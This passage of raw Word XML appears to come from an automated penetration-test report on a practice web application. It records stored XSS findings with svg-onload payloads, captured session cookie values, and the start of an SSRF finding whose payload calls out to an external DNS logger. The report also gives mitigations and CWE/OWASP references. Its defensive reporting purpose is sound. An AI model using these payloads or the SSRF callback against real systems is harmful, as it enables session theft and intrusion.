              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="480DE849" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayFirstColumn"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2066"/>
        <w:gridCol w:w="7783"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="72561E7D"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58950672" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="682519A8"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51">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/xss_s/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="37E0D600"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6CDCA728" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68058C36" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="597F5E00"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477E846F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BAB6645" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>mtxMessage</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Body Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="10BCBA48"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06460649" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="476BE1A8"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Injected the payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>&lt;sVg/onLOad=document['body']['append'](`c96ad3e0`['repeat'](2))&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>mtxMessage body parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and the expected result </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>c96ad3e0c96ad3e0</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> was found in the response.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">The script inside the payload tries to repeat a random string. If the string </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>c96ad3e0</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> is doubled on the response page, we confirm that our script has been executed.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>This request was done using a Chrome browser.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">If available, the replay attack button uses a simpler </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>alert()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> payload that may not work as expected.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>To validate the vulnerability, we attempted to extract some data exposed by the application in the browser.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">The application uses the following (non-HttpOnly) cookies: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>_ga:GA1.1.1244663522.1739354417_ga_Z3XCDXSJ3P:GS1.1.1739354416.1.1.1739354516.20.0.0_gcl_au:1.1.613626497.1739354416PHPSESSID:19d5a469db64624265da3f93925f7be3security:low</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId52">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3343243D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayFirstColumn"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2066"/>
        <w:gridCol w:w="7783"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="40334186"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31D207F6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61882D00"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53">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/xss_s/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1887998B"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09659A6F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19E24541" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="03B7CD85"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251A358D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="798523B5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>txtName</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Body Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7F59C6B9" w14:textId="77777777" w:rsidTr="005838D5">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5206" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D54170C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E04F5E2"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Injected the payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>&lt;sVg/onLOad=document.body.append(`6fdca7ee`.repeat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>(2))&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>txtName body parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and the expected result </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>6fdca7ee6fdca7ee</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> was found in the response.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">The script inside the payload tries to repeat a random string. If the string </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>6fdca7ee</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> is doubled on the response page, we confirm that our script has been executed.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>This request was done using a Chrome browser.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">If available, the replay attack button uses a simpler </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>alert()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> payload that may not work as expected.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>To validate the vulnerability, we attempted to extract some data exposed by the application in the browser.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">The application uses the following (non-HttpOnly) cookies: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>_ga:GA1.1.1244663522.1739354417_ga_Z3XCDXSJ3P:GS1.1.1739354416.1.1.1739354516.20.0.0_gcl_au:1.1.613626497.1739354416PHPSESSID:19d5a469db64624265da3f93925f7be3security:low</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId54">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3229AF6E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="043BCAFC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E6C59F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found that the target web application is vulnerable to Cross-Site Scripting (XSS) attacks. This vulnerability is caused by inadequate input validation, allowing a malicious actor to inject and execute JavaScript code in the context of another user's session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24380E59" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B3EE8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that the code injected by an attacker could potentially lead to effects such as stealing session cookies, calling application features on behalf of another user, exploiting browser vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Successful exploitation of Cross-Site Scripting attacks requires human interaction (e.g. determine the user to access a special link by social engineering).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F90434" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01230208" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>There are several ways to mitigate XSS attacks. We recommend to:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- never trust user input</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- always encode and escape user input (using a Security Encoding Library)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- use the HTTPOnly cookie flag to protect from cookie theft</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- implement Content Security Policy</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- use the X-XSS-Protection Response Header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371196CB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D2B1D4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId55">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/xss</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05FCED48" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId56">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53279FC6"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3585F58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322946BF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="748BE2BA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7721F0E8" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F2819F8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70794390" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId57">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-79</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5361CD9D" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C23EF63" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39A39397" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId58">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A7 - Cross-Site Scripting (XSS)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="593BBDBC" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A19DDFE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D6650EE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId59">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A3 - Injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63EAB820" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA693DE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1783893D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C34979E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.7 Server Side Request Forgery </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5415670C" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78A9538C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12F7292F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="2EF3A533" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E9F453C" wp14:editId="7F2FDEF7">
                  <wp:extent cx="1397000" cy="1397000"/>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7DFD11ED" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="541F292D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="4A7B79D1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70A5AA7B"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2731"/>
        <w:gridCol w:w="7119"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0E47378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E8A146A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="323DF75B"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61">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/fi/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0B51721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D29E4DF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B3E2D02"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59489CE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E9246A0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CAC4E67" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>page</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="462C319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1B95CA8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F247F15"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payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>http://25979911277719046700.taaIqJBO4h.bgGkxqapaY.ptt-logger.net</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>page query parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> triggered a DNS lookup to one of our DNS loggers: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>taaIqJBO4h.bgGkxqapaY.ptt-logger.net</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. The DNS lookup was for a record of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> type coming from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>109.74.192.20</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId62">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2877CD25" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayFirstColumn"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2731"/>
        <w:gridCol w:w="7119"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3224AB3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05C302" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5316F0E7"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63">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/fi/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="68907BB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3C8C933" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08DB852B"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3739914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9E7050F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
